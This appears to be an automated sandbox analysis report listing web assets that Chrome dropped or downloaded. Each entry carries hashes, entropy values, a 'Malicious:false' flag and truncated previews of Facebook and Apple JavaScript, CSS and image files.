                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ActiveFocusRegionUtilsContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);c=b;g["default"]=c}),98);.__d("BaseChameleonThemeContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b={classNames:null};c=a.createContext(b);g["default"]=c}),98);.__d("BaseDOMContainer.react",["react","useMergeRefs"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||(h=d("react"));b=h;var j=b.useLayoutEffect,k=b.useRef;e=i.forwardRef(a);function a(a,b){var d=a.node,e=k(null);j(function(){var a=e.current;if(d!=null&&a!=null){a.appendChild(d);return function(){a.removeChild(d)}}},[d]);a=c("useMergeRefs")(b,e);return i.jsx("div",{ref:a})}a.displayName=a.name+" [from "+f.id+"]";d=i.memo(e);g["default"]=d}),98);.__d("BasePortalTargetContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(document.body);g["default"]=b}),98);.__d("BasePortal.react",["BaseChameleonThemeContext","B
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3038)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):18941
                                                                                                                                                                                                                                Entropy (8bit):5.490259234595834
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:tU4yDsD1OFIQ6GT4n9SiSAi7xnBGa8s8qVLevj9vPNpDVeVSA2aUjZAKYDgocOb3:VyDe1Oia+9SGDbaUj+nDJb
                                                                                                                                                                                                                                MD5:FB5DEFA61F6FB338A356269C5ABA01EC
                                                                                                                                                                                                                                SHA1:D883B45E47CF0AC862C9E0AC50744181273109FC
                                                                                                                                                                                                                                SHA-256:4F3390730744441B70F7D2285B715923257BF0B002C1B0D3EBF476C963710084
                                                                                                                                                                                                                                SHA-512:9D1A936FED61E58AF0D7406B06DF4C41DFE1B3FC0FABCB1D15B20891879D5DF39FF53528FF4858EF7661575694FB2AC73B24F7A1622556D853F6F399214405EA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsPerfTiming",["performance"],(function(a,b,c,d,e,f,g){"use strict";var h;b=(h||(h=c("performance"))).timing&&(h||c("performance")).timing.fetchStart||a._cstart;g.start=b}),98);.__d("BinarySearch",["unrecoverableViolation"],(function(a,b,c,d,e,f,g){"use strict";e={GREATEST_LOWER_BOUND:"GREATEST_LOWER_BOUND",GREATEST_STRICT_LOWER_BOUND:"GREATEST_STRICT_LOWER_BOUND",LEAST_STRICT_UPPER_BOUND:"LEAST_STRICT_UPPER_BOUND",LEAST_UPPER_BOUND:"LEAST_UPPER_BOUND",NEAREST:"NEAREST"};var h=function(a,b){if(typeof a!=="number"||typeof b!=="number")throw c("unrecoverableViolation")("The default comparator can only be used with sequences of numbers.","comet_infra");return a-b},i=e.GREATEST_LOWER_BOUND,j=e.GREATEST_STRICT_LOWER_BOUND,k=e.LEAST_STRICT_UPPER_BOUND,l=e.LEAST_UPPER_BOUND,m=e.NEAREST;function n(a,b,c,d,e){e===void 0&&(e=h);var f=l;f=p(a,b,c,d,e,f);if(c<=f&&f<d){c=a(f);return e(c,b)===0?c:void 0}else return void 0}function o(a,b,c,d,e){e===void 0&&(e=h);var f=l;f=p(a
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6735)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):28815
                                                                                                                                                                                                                                Entropy (8bit):5.582969537394197
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:RDfALR2Eq9iqM9iO8YMri4HJQ6deqtl4E7gqzIoTvvaiQYKhc3wSW0Dm6/mXXKO3:RDcCJQ6dBfYregv0D/+KOx1
                                                                                                                                                                                                                                MD5:B9B91A44A89E975AD8A814EA863AF491
                                                                                                                                                                                                                                SHA1:F56DC8A28B471EA8F0153333DD13634FB3C382F5
                                                                                                                                                                                                                                SHA-256:B734E9ACF9AB9F17CB40B8916CB03C7544FC7915951E9D9724024AD69AAA27ED
                                                                                                                                                                                                                                SHA-512:46943E2F2EE1A6F9823C52976BEDF2E4401161AA41ACF377A2B13A0818F003CCF6C54F7946C6051A7912A767C195DEF516F071B43685A1AC3F755A0B64B67394
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("BanzaiAdapter",["cr:5866"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:5866")}),98);.__d("BanzaiConsts",[],(function(a,b,c,d,e,f){a={SEND:"Banzai:SEND",OK:"Banzai:OK",ERROR:"Banzai:ERROR",SHUTDOWN:"Banzai:SHUTDOWN",BASIC:"basic",VITAL:"vital",BASIC_WAIT:6e4,BASIC_WAIT_COMET:2e3,VITAL_WAIT:1e3,BATCH_SIZE_LIMIT:64e3,EXPIRY:864e5,BATCH_TIMEOUT:1e4,LAST_STORAGE_FLUSH:"banzai:last_storage_flush",STORAGE_FLUSH_INTERVAL:12*60*6e4,POST_READY:0,POST_INFLIGHT:1,POST_SENT:2};b=a;f["default"]=b}),66);.__d("BanzaiUtils",["BanzaiConsts","FBLogger","cr:1172","cr:9985","cr:9986"],(function(a,b,c,d,e,f){"use strict";var g,h={canSend:function(a){return a[2]>=b("cr:9985")()-(g||(g=b("BanzaiConsts"))).EXPIRY},filterPost:function(a,c,d,e){if(e.overlimit)return!0;if(!e.sendMinimumOnePost&&a[4]+e.currentSize>(g||(g=b("BanzaiConsts"))).BATCH_SIZE_LIMIT)return!0;var f=a.__meta;if(f.status!=null&&f.status>=(g||(g=b("BanzaiConsts"))).POST_SENT||!h.canSend(a))return!1;if(f.status!=null&&f.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (7012)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):356138
                                                                                                                                                                                                                                Entropy (8bit):5.45076746390211
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:XV3slatr7uVNns/RV+uojzv5C/BRtJV5nitT6GTC7ayZZA2lcdbZiiFxEytmt7my:V4iBojzYGteGnEKhU3C5rQ2kf
                                                                                                                                                                                                                                MD5:E8A499F06B95FAFA1655C0560E51BE43
                                                                                                                                                                                                                                SHA1:F2E2566A2F011BD0605A2EDE079015E3508F0DB6
                                                                                                                                                                                                                                SHA-256:6DF0CC8AC7A1DD4A7FB2466B264224D1713151E3C319D6B0D94168D6E7CECE7D
                                                                                                                                                                                                                                SHA-512:7F0D086033A5A991F52D2FFA04396121C41DE3A93F4AEAB2AFCDCC2E88353F56516F3261D5EE616DD258A7FF64A0F7469F0462979A5493802EA0D82F17F90698
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ActiveFocusRegionUtilsContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);c=b;g["default"]=c}),98);.__d("BaseChameleonThemeContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b={classNames:null};c=a.createContext(b);g["default"]=c}),98);.__d("BaseDOMContainer.react",["react","useMergeRefs"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||(h=d("react"));b=h;var j=b.useLayoutEffect,k=b.useRef;e=i.forwardRef(a);function a(a,b){var d=a.node,e=k(null);j(function(){var a=e.current;if(d!=null&&a!=null){a.appendChild(d);return function(){a.removeChild(d)}}},[d]);a=c("useMergeRefs")(b,e);return i.jsx("div",{ref:a})}a.displayName=a.name+" [from "+f.id+"]";d=i.memo(e);g["default"]=d}),98);.__d("BasePortalTargetContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(document.body);g["default"]=b}),98);.__d("BasePortal.react",["BaseChameleonThemeContext","B
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3814
                                                                                                                                                                                                                                Entropy (8bit):7.871541682436775
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:cZ3KVPcErbmf3XCy1CSuLZIezijXSWX7ZDjmzkrk1JrA92iK:cdK5cb3nM7LZRzcXXrZGzkrk1JrAE3
                                                                                                                                                                                                                                MD5:1B93291952A9279098E75F2D255BD09A
                                                                                                                                                                                                                                SHA1:03CA4D77C2ADD95DF56D2442D58B5DB87BEA46C8
                                                                                                                                                                                                                                SHA-256:BC293C8D38B59A0BFE788F7F4197A9FEFF9546F279077CE8049D77EBE5031D4D
                                                                                                                                                                                                                                SHA-512:933DF67F6834E1101E7904E9C69577B9A556EFE9220A001A251ECE951AC786EF885E7A6D60C7DEA63E5F1E7D6A72F8CEE15D61AE97E13ED3B99A94A912EE456B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8L..../?....3m.(]..?.i.".?...@u...i..D..-.x.."IR..{Of..6I..H......W.....R.....X.`..rx.....|.\.HM......V...p.....{.......a...w0D...."}.4.[.v+I.$.E.b.{KAE.8. .M......tG.....Hr$.Q3w..}.UJ.$.$.9...I.....m.HJ...:...7....m...t.w..m..1^.mc..O{....m.l....T......H.].J....i..._.w..4...x.m.mk.JmcLl..m.m[1..l...}..`G........$.6K...t.4{.iv..G.c..x.]....y.4...G\..9.8....p.p.x<ERI.A.$I.....b....s6...&.b.1$.f..4.N.Wz*.4p .c...bBAX..........e.&..e.^hds"'.F...%...0.... c5.lFE.BL...#.~@.s.,.."..pD#.!.l``#.$.`....C..b..<...#f.6:.,...J.4z..+..4k.f.../l'}r....k.YBl....\..b..nmF..../.9t....r....q.Y.t.d7...0.O..hP9..,h....7|.O...n.[E..|.Q....G.k..ql.....e.1.!#"D#6.8..8.M.M..9.....+'....C....m.1...0.}.....>.t.......A..M.b...?x..!......sv~.oO.s..\...+..b.`.i.Z...9..Hr0.*....r. y..u8.?.E.......5...@*..._..U.U....=|-....MP.a5[.j..S.:.x..@-..~H, 0...F.....b:..P..p..7..Wfe.|.>...%.e........|........2p..?.I.....@......O..3W....iy9|.!....pd.;'O.F@..V@.n
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (7780)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):45002
                                                                                                                                                                                                                                Entropy (8bit):5.45952480481115
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:/+7HfJzz/IixGgUwVy8CZD4cTxW5lVPgrfwhRBB9Y6HrjIyKqe08Hfb:W7HfvUwVy864ZL+fwh4z/b
                                                                                                                                                                                                                                MD5:30D99FF9D0130FF15ECD46F9C4816BA6
                                                                                                                                                                                                                                SHA1:BD98D3047B1855D008E615077D155BFEE701BB9F
                                                                                                                                                                                                                                SHA-256:0C31EC8A54F2AF241561936BB614921C725876D403ECC78C40D2D4FEB7F2E605
                                                                                                                                                                                                                                SHA-512:E86CE3219C565CA83FB16235980ACDB10B2E6B94028E6BA2F41701368A27600C8ADF5BA7071251E30E1D52F5958D59504F2349DC5934CC7569CEB5A085B19222
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ActorURI",["ActorURIConfig","URI"],(function(a,b,c,d,e,f,g){var h;function a(a,b){return new(h||(h=c("URI")))(a).addQueryData(c("ActorURIConfig").PARAMETER_ACTOR,b)}g.create=a;g.PARAMETER_ACTOR=c("ActorURIConfig").PARAMETER_ACTOR}),98);.__d("BladeRunnerDeferredClient",["Promise","nullthrows","requireDeferred"],(function(a,b,c,d,e,f,g){var h;a=function(){function a(){this.$1=null}var d=a.prototype;d.requestStream=function(a,b,d,e){this.$2();return c("nullthrows")(this.$1).then(function(c){return c.requestStream(a,b,d,e)})};d.logInfo=function(a){this.$2();return c("nullthrows")(this.$1).then(function(b){b.logInfo(a)})};d.bumpCounter=function(a){this.$2();return c("nullthrows")(this.$1).then(function(b){b.bumpCounter(a)})};d.$2=function(){this.$1==null&&(this.$1=new(h||(h=b("Promise")))(function(a){c("requireDeferred")("BladeRunnerClient").__setRef("BladeRunnerDeferredClient").onReady(function(b){a(new b())})}))};return a}();d=new a();g["default"]=d}),98);.__d("Bla
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:MS Windows icon resource - 3 icons, 48x48, 24 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):12014
                                                                                                                                                                                                                                Entropy (8bit):5.8597190788401115
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:L7xWVSgHQUkVbBQZf8POXQu2jMLlZYrZ7667V776+:L7xWVSgiV27QfjMLcrj
                                                                                                                                                                                                                                MD5:87052396F5FFD63B642D1BAB54E7EDB7
                                                                                                                                                                                                                                SHA1:F3E75DDE1FAD3A5FE639E3D0C04122FCFAB918E2
                                                                                                                                                                                                                                SHA-256:EA54FEA4CE7FCA6339E5B437CA43CBD46C84AA46477BE66436608B5FB0A9E02C
                                                                                                                                                                                                                                SHA-512:84F96774BF4E8CE6BDFFC68AB6ADFBAA7508BD8E9A3372A33C0032FB519BF51A6AFB34CD70CE8A84C32A1F4BEC2442B87CB5CBEE86EDD468D510E502705D4788
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:......00..........6... ......................h....)..(...0...`................................r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..v..v..u..v..v..u..u..u..v..u..v..v..v..u..v..v..u..u..u..v..u..u..v..v..v..u..v..u..u..u..v..u..u..v..v..v..u..v..v..u..u..u..v..u..u..v..v..u..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..}..}..}..}..}..}..}..}..}..}..}..}..}..}.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (821)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7626
                                                                                                                                                                                                                                Entropy (8bit):5.215559608926212
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:OtQ0m8mBOZgS9tn0Ll9829FAeHlVPrMNW:OtFuSD4829FAeHzPAW
                                                                                                                                                                                                                                MD5:33AF753815E0763128B33C38F393AF19
                                                                                                                                                                                                                                SHA1:FD81C07EDD497B91F91629687D2AB6976F287E17
                                                                                                                                                                                                                                SHA-256:A7A8465112A5F495E5C95139568A59BF35B3116624A5861B71472070520D699E
                                                                                                                                                                                                                                SHA-512:D5981A0D80035A3E0B8EFBE12B90C5E82A53F8C2CBC100001D344DC645B07A76DB3B75D863A5BB733F54B9E13B4C0A515B63041F50DCFC9AC750C092C436DBF5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[26],{71026:function(e,t,n){n.r(t),n.d(t,{environment:function(){return a},eventRecorder:function(){return F},immediateEventRecorder:function(){return q},logger:function(){return D},network:function(){return E},setEventQueuePostIntervalEnabled:function(){return N}}).var s=n(76588),r=n(24178),u=n(32722),o=r.SC.attachDelegate,a={setDelegate:function(e){return o(this,e)},globalScope:function(){return window}},i={AJAX:"ajax",AJAX_SYNCHRONOUS:"ajaxSynchronous",IMAGE:"image",BEACON:"beacon"},v=r.vc.metricsDisabledOrDenylistedEvent,c=r.vc.removeDenylistedFields,l={},p=["dsId","consumerId"].function f(e,t,n){var s=null.return n&&!v.call(u.Z,n.eventType,t)&&(c.call(u.Z,n,t),m(t,n),e.apply(null,Array.prototype.slice.call(arguments,1)),s=n),s}function d(e,t){l[e]=l[e]||{},l[e]=t}function Q(){l={}}function m(e,t){l[e]=l[e]||{},l[e].anonymous&&p.forEach((function(e){delete t[e]}))}var y=r.SC.attachDel
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4083)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4295
                                                                                                                                                                                                                                Entropy (8bit):5.30261790907087
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:xqYiUs0iqHjly3HHe+F03J8ZwEuSs86tBjjHyRC:kjVRqZy3xF03J6ZuSsJvXD
                                                                                                                                                                                                                                MD5:65751269352F5C7FF3E35C83A025E2CE
                                                                                                                                                                                                                                SHA1:BEC653BBE4E1160BC9E36F2A9F105B52842883C5
                                                                                                                                                                                                                                SHA-256:14F90CE2F1A178960CE7F253D6FC129D6D0C844600947E9D8CBCE565F88C898E
                                                                                                                                                                                                                                SHA-512:E44A09A92CFDF22D30E8BBACFAB25FACF64CD519C5596DF3D18D5AAD0D8FC21352293B02320ECADE7B444BB6097A01B679F27686E8CD4726B895BD358158082C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("XDOMScannerResultsControllerRouteBuilder",["jsRouteBuilder"],(function(a,b,c,d,e,f,g){a=c("jsRouteBuilder")("/shared/user_preferences/",Object.freeze({}),void 0);b=a;g["default"]=b}),98);.__d("DOMScanner",["Base64","ConstUriUtils","DOMScannerConfig","FBLogger","JSScheduler","Promise","WebStorage","XDOMScannerResultsControllerRouteBuilder","cometAsyncFetch","isFacebookURI"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j,k=0,l=!1,m=!1;function n(a){return a.startsWith("data:")&&a.includes(";base64,")}function o(a){return n(a)?!1:q(a)}function p(){var a=[],b=document.getElementsByTagName("*");for(var c=0;c<b.length;++c)b[c].shadowRoot!=null&&a.push(b[c]);return a}function q(a){a=d("ConstUriUtils").getUri(a.toString());return a==null?!1:!c("isFacebookURI")(a)}function r(){var a=[],b=p();for(var c=0;c<b.length;c++){var d=b[c],e=d.getBoundingClientRect();e=JSON.stringify({position:{b:e.bottom,l:e.left,r:e.right,t:e.top},size:{h:e.height,w:e.width}},null,2);a.push(["s
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):366
                                                                                                                                                                                                                                Entropy (8bit):4.978776395938356
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:tI9mc4sl3UE7wRtG2VEWhGWLYayuRt+wyo6YmBQWLvQVHwB5JbHdGoQgQSx:t41MfYWcWjyuf+wyoNMQ/wB5Gg9
                                                                                                                                                                                                                                MD5:BC4F4BFDD931E007AB096DD1C209C689
                                                                                                                                                                                                                                SHA1:9D97DA68C8FE7482E604148596EF8A97792AC08A
                                                                                                                                                                                                                                SHA-256:03B3A7317370504145583EB221372D6C19C060F84F10CF391459E7441E95C381
                                                                                                                                                                                                                                SHA-512:371F30F422B303D4A45136181372C7E95D3EFCEFCCFB13B7D3640EDE79802C840437AE14D3154750095F69748D87F6520265F01025B32D8E39C3CAFE4EC6D8F2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 13 28">. <path fill="#FF9500" d="M6.496.173L4.521 5.251H.007l3.738 2.751-1.481 5.149 4.232-3.386 4.232 3.386-1.482-5.149 3.739-2.751H8.471z"/>. <path fill="#BFBFBF" d="M6.5 14.35l-1.978 5.087H0l3.745 2.755-1.484 5.158L6.5 23.959l4.239 3.391-1.484-5.158L13 19.437H8.478z" transform="translate(0 -.15)" />.</svg>.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (58132)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):536282
                                                                                                                                                                                                                                Entropy (8bit):5.292143500030478
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:8jo5iuKWmTUoKtfzNdK6neczoPGUd4Kyu:8jo5j4AFtfzvrwvSKyu
                                                                                                                                                                                                                                MD5:6034CA9BCA643FF2E70B2BE7FFF87AE4
                                                                                                                                                                                                                                SHA1:31A4824AEF5960C655DC10B76BADD3ECCD7E8DE3
                                                                                                                                                                                                                                SHA-256:D75506024748F28A97487A93F4DC4AEA752CF5A32B2AD7B19B844D35524A1908
                                                                                                                                                                                                                                SHA-512:916333AAEFFCC0E6CB58E2279471DD7225B8C999B87B51EA9DC5E7147E38876DD3CFF503E993264BCF3298EDB3EF33750C0824897F65D5D9ABBB4A9B2DA1DA4A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0,cross/sz9JnoPJuhF.css"
                                                                                                                                                                                                                                Preview:.x18l19kd{--accent:var(----accent,revert)}.x1b0580a{--primary-text:var(----primary-text,revert)}.x1i2ug1n{--primary-button-background:var(----primary-button-background,revert)}.x1obymqx{--secondary-text:var(----secondary-text,revert)}.x1v5e2he{--secondary-icon:var(----secondary-icon,revert)}.x6vdh9z{--primary-icon:var(----primary-icon,revert)}@keyframes xct2g7x-B{0%{transform:scale(1)}25%{transform:scale(1.2)}50%{transform:scale(.95)}100%{transform:scale(1)}}.xixsox3{--primary-deemphasized-button-text:var(----primary-deemphasized-button-text,revert)}.xkwi5dx{--primary-deemphasized-button-background:var(----primary-deemphasized-button-background,revert)}.xtnm4v3{--hosted-view-selected-state:var(----hosted-view-selected-state,revert)}.xtt6w6i{--highlight-bg:var(----highlight-bg,revert)}.xv8rz1w{--primary-button-text:var(----primary-button-text,revert)}.x168l2et{scroll-snap-type:y mandatory}.x1hl2dhg{text-decoration:none}.xe8uvvx{list-style:none}.xhfbhpw{scroll-snap-type:x mandatory}.xmql
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (750)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):2169
                                                                                                                                                                                                                                Entropy (8bit):4.9548772147686115
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:ildRbgqluYoCoLUmledemlxUlIUvfALSAl/lmmqlmWlfBlAlVlWlgwheAYf9hbF5:INx4gd/d4fTvsaMefp5oD
                                                                                                                                                                                                                                MD5:89F8EE167E82FADB507197C109ED684B
                                                                                                                                                                                                                                SHA1:F5A728E7805C71BAE1A8786921AB2735AB07C15E
                                                                                                                                                                                                                                SHA-256:0B70D5380DCC5A0C4BDD30DE4D68C4B0F598EB4EA92BEEC1B6D5F0852BD96D22
                                                                                                                                                                                                                                SHA-512:BC12D7CB827E364176A691C2ED5C73A481547C572A0C00E5FF6B8BD8E698AC7DA96F2D8DA08485F9363F98A1F21338E61A9E813A31DF0A2EB7E96D43A902E5CE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/chunk.961.e281a7b797aa9204873b.js
                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[961],{54961:function(n,e,t){t.r(e),t.d(e,{cleanup:function(){return c},environment:function(){return o},eventQueue:function(){return i},eventRecorder:function(){return r},immediateEventRecorder:function(){return u}}).var i=t(71026),o={_document:function(){if("undefined"!=typeof document)return document.throw"metricskit-delegates-html.environment HTML delegate 'document' object not found"},_window:function(){if("undefined"!=typeof window)return window.throw"metricskit-delegates-html.environment HTML delegate 'window' object not found"},cookie:function(){return o._window().document.cookie},pageUrl:function(){return o._window().location.href},parentPageUrl:function(){var n,e=o._window(),t=e.parent.if(t!==e)try{n=t.location.href}catch(e){n=o._document().referrer}return n},pixelRatio:function(){return o._window().devicePixelRatio},screenHeight:function(){return o._window().screen.height},scre
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 283 x 263, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):4185
                                                                                                                                                                                                                                Entropy (8bit):7.930678153674384
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:NT31C9FxEGbTBRaRHPa2+F9/21MAJG5tXqq+QEsM8j:14vblcP9S9/21MAJG5tXqqPx
                                                                                                                                                                                                                                MD5:751D367A30A43C744E348FCFB4CB923B
                                                                                                                                                                                                                                SHA1:1269F17B9303BB44B88FCF35CFF9737004F60126
                                                                                                                                                                                                                                SHA-256:9A853EE2B4A016F552DAABBBE4170098422174DABF5967FBAFDEBD604119F91C
                                                                                                                                                                                                                                SHA-512:98E2A077C9831DAF2806A7121BF8D9A9EF10634E05C50CBD9E6EDE7661B8A5FF2A39687D956531BC92D6D634CBE5679A7C2B427358839F5C365E9B7312D29970
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yP/r/ZQxGeuP1tWI.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR.....................PLTELiq.)3*18X_f~...........%/9@G.&0......ccc...nu}............CJQ!,6......?FM7>E!(.LSZ.'2...:AHhow3:A......&-3....../7=bjq............FMT,39'2<.....emt........<DJ..........HOVy~.$.9......T[c...S[b......[cj.........JQX+6A......]elccc...x}....uy|")/fnusz....y..........GNUOV]|..jry...(/5..........ccc...?g..%/......Bc..-<...aip(>]4R.)3>",7.......)3CJQ\dl...#-8...T[c.'2...FMT.................&0emtsz....3:@....X_fy~.QY`?FMOV]......JQX....../:E;CJ...&1;GNULSZ+28+6A.................9@G...hownu}..........!(......y..jqy...~..2<H......4?J...}............u}...................aly.......pw................................................../6=...[frksz...bjq...Y`g|.....?IU......dks'.4_gn...HS_uy|..........7BMOZf...08>...7>E...EP[...&-3...5My*:UU`md.."...ftRNS...&f....r..{....M..)6....P..t.k:.H."....=f..,J...FX...b.. ....^....o..y. ..4.2[....R.r.D.l..s.....IDATx...ip.e...g....+...BB. ..K..A.9....\w...........[.I .. @...-.(
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6316)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):89262
                                                                                                                                                                                                                                Entropy (8bit):5.433844673295272
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:EKzHfiewWzy+0OqtgKHQilCryLQa+gRd9NjppfpVDl6LvuAsu1UavNult+TFYTJT:EuH3zm3HZYyMaLRBcBvst+TFYTJT
                                                                                                                                                                                                                                MD5:E8D3A6185D998234F144081623E5B457
                                                                                                                                                                                                                                SHA1:27121EFCD7BC165C1EF9948E7FD7D265F09CBC53
                                                                                                                                                                                                                                SHA-256:CA6A438B9F61C9A965A1586A4D5750E3366861A20B74C2FF01D1B44CCE47B701
                                                                                                                                                                                                                                SHA-512:5CDAEBEAF6E79743518E54692CA70E4E0AABCFDBF8CF4A565611292072FCDE763F06287D18268B9C58E0BE32CC8D4A2157DD3C8E95D48D589BE9D7BE91683553
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iO_y4/y8/l/en_GB/81PfJWE3AVG.js
